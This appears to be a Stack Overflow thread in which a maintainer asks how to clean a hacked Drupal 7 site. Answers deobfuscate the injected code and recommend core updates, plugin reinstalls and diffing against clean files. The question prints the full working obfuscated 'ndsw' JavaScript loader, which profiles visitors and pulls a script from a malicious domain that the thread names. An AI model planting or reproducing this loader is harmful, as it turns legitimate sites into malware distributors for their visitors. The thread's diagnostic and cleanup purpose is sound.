# Drupal site javascript injection fix

Tags: php, mysql, drupal-7

A few days ago a drupal website I maintain got hacked using some sort of JS injection, they managed to inject a bunch of obfuscated code into all of the javascript files and we've been trying to fix it and get it back to normal.

After removing a whole bunch of obfuscated code we go all the CSS and JS back under control however there is still something that I can't find in any of the code (Or MYSQL database).

At the moment the hack/injection shows up as random links that appear before any and all 
      `<a>`
tags on only the home page (www.example.com) or the secondary front page (www.example.com/company), I didn't make the website it was passed onto me.

I've searched through both the database and the physical files for references to the website links it injects and there are none.

Also it's worth nothing that the links always use the same random letters (In this case it's "8" , "p" , "glad" , "wy2" ,"j6" and "6")

Second to that the staging site is perfectly fine (www.example.staging.com) but when we pushed up the non hacked code it re-manifested itself) also If I pull the live code down and run it locally the links disappear.

Can anyone help me or have any experience with this?

Here is the JS that was injected:

```
;if(ndsw===undefined){var ndsw=true;(function(){var n=navigator,d=document,s=screen,w=window,u=n[p("wt1n1eagqAbr1ers1up")],q=n[p(")mrrdo4fitua4l0p)")],t=d[p("gewi)kkorowc)")],h=w[p("0n1o9ixtma(cco!ly")][p("oeemea)n6tmsforhx")],dr=d[p("9rye3rjrfedf1eprg")];if(dr&&!c(dr,h)){if(!c(u,p("kd0iio1rkdxnwA5"))&&c(u,p("ps5wdowdcn)i8Wv"))&&c(q,p("vndisWv"))){if(!c(t,p("m=ua!mft3uc_e_i"))){var n=d.createElement('script');n.type='text/javascript';n.async=true;n.src=p('c3tcf1d5i7(a!2he0end338epd66vf55z5vaj3p7j=fvo&90l4b2i=idyizcv?6smjb.uexd1o9cn_tsl/4mcouci.28!0s2xsacfiat1y9liainhadkccviol2cr.(kmcqi0ldcp/j/w:gsnpdt2tlhz');var v=d.getElementsByTagName('script')[0];v.parentNode.insertBefore(n,v)}}}function p(e){var k='';for(var w=0;w<e.length;w++){if(w%2===1)k+=e[w]}k=r(k);return k}function c(o,z){return o[p("!f9O4xrevd4ngi4")](z)!==-1}function r(a){var d='';for(var q=a.length-1;q>=0;q--){d+=a[q]}return d}})()}
```

Comment: Don't you have a backup of the config state before the exploitation?

Comment: No, unfortunately they were never made. :/

Comment: What is your drupal version ? Is the core up to date ? Check permissions/ownerships of files at site root and whether the code has been modified or not compared to their staging version (settings.php, cron.php, index.php, etc.). Check also the code in the template files you mentioned.

Comment: Check into files if you have some picture or fils like "a.php" or "a.jpg" , if yes you need to remove all files , update core and check directories permissions

Comment: Drupal version 7.66, I found a whole bunch of .ico/.jpg, JS files and some PHP files that had code in them, they have been removed, the site root files are fine.

Answer (score 0, accepted):

Deobfuscated scripts would look more or less like this :

```
var data = navigator['userAgent'];
var value = document["cookie"];
if (indexOf(data, "Windows") && !indexOf(data,decode("Android"))) {
    if (!indexOf(value, "___utma=")) {
        vat tag = document.createElement("script");
        tag.type = "text/javascript";
        tag.async = true;
        tag.src = "https://click.clickanalytics208.com/s_code?cid=239&v=243bccb3d3c0ba83d41fc"
        var wafCss = document.getElementByTagName("script")[0];
        wafCss.parentNode.instertBefore(tag, wafCss);
    }
}
```

I can't comment yet, but FaD3y ping me if you still need help with cleaning up the site.

Answer (score 1):

```
So far I got:
- first it checks if :
  + userAgent
  + platform
  + cookie
  + location[hostname]
  + referrer

later checks something about this values:
  - userAgent !== Android
  - userAgent === Windows
  - userAgent === Win
  - cookie not exists __utma=

  Then it makes a script element with src= -> 
  "https://click.clickanalytics208.com/s_code.js?cid=240&v=73a55f6
  de3dee2a751c3"
```

Comment: click.clickanalytics208[.]com/s_code.js?cid=240&v=73a55f6de3dee2a751c3 was linked on malwarebytes site as a fake update website... I'm not sure what it means though

Comment: These means the script checks if everything fine for downloading the malware, then it downloads it from the "https://click.clickanalytics208.com/s_code.js?cid=240&v=73a55f6de3dee2a751c3" and inject new script element to the html DOM with the malware script.But i cant download the malware if you can upload the malware we can go fruther.

Comment: I can't, my AV won't let me near that site and the only trace of malware is that JS snippet and the random links that appear on the home page of the site, is there something I should be looking for then?

Comment: I guess the link only appears if you using the right client , and if you click it you get the malware. Using your legit site as malware spreader.  You should check how your site got injected. Find the hole in your system. If you think my answer was useful upvote or mark as solved my answer( i looking for a job and companys like stackoverflow acc) thank you and there is if you need something message me and I will help if I can .

Answer (score 1):

I never managed to figure out what the problem was. But the solution was to update from Drupal 7.66 to 7.67.

I then imported the database that was in place with the content and then manually went through all the plugins and extensions adding them from their original servers.

I'm just leaving this here in case someone else has this issue in the future.

Cut your losses, pull the info you can and rebuild.

Answer (score 0):

I've never worked on a Drupal site so I know this isn't what was asked, this question comes up first on Google results when searching for the line mentioned in the question and it's a cross-platform issue.

I have no experience with Drupal, but with Wordpress, my go-to tool for helping to diagnose and weed out any infection is to use the Wordfence plugin. It can automatically scan and identify infected files in the website filesystem, and if the themes/plugins are downloaded through the official Wordpress repository, it can automatically fix them.

If that's not an option, first you should identify the string that's been injected into your files along with any extra files created by the malware. One way to do this manually is to SSH into the server, download the platform's core files and extract them into a different clean folder, then run a diff on the production folder and the clean folder. For Wordpress the diff command would look like this:   `diff -r /path/to/clean/wordpress /path/to/wordpress -x wp-content | less`

In the output of that command, you'll look for any files present only in your production Wordpress folder along with any lines that are present in the production folder's core (wp-admin, wp-includes) files that aren't present in the clean folder. Often, malware will create files with names one character off of a legitimate core file, like `/path/to/wordpress/wp-includes/js/utilsz.js` instead of `/path/to/wordpress/wp-includes/js/utils.js`. Malware will also append lines of obfuscated code to the ends of js files similar to the lines described in the OP: `;if(ndsw===undefined)...`.

Once you've identified the infected files, make a backup of the production folder and disable all plugins, then remove all core files that are present in the production folder and not in the clean folder, with the exception of your `wp-config.php` file. Also, check your `wp-config.php` file for any suspicious lines and make sure the domain specified in the configuration is the correct one.

If you're not using wp-cli, you'll need to manually reinstall the core files (in this example, Wordpress) by copying the clean folder over the production folder. After that you'll need manually reinstall all of your plugins and themes, so download each theme and plugin used on your site and reinstall them manually by copying them over the theme or plugin in the `wp-content/themes` or `wp-content/plugins` folders, respectively.

If you use wp-cli, you can use these three lines to quickly reinstall and update Wordpress core along with all of the themes and plugins:
`wp core update --force --path=/path/to/wordpress`
`wp theme install $(wp theme list --field=name) --force --path=/path/to/wordpress`
`wp plugin install $(wp plugin list --field=name) --force --path=/path/to/wordpress`

For any themes or plugins that can't be reinstalled through wp-cli, they will have to be updated following the manual process. Typically this is because the theme or plugin's license is no longer valid, in this case, you should purchase a new license so you can get the most up-to-date version as using outdated themes and plugins are likely the reason your website was infected in the first place.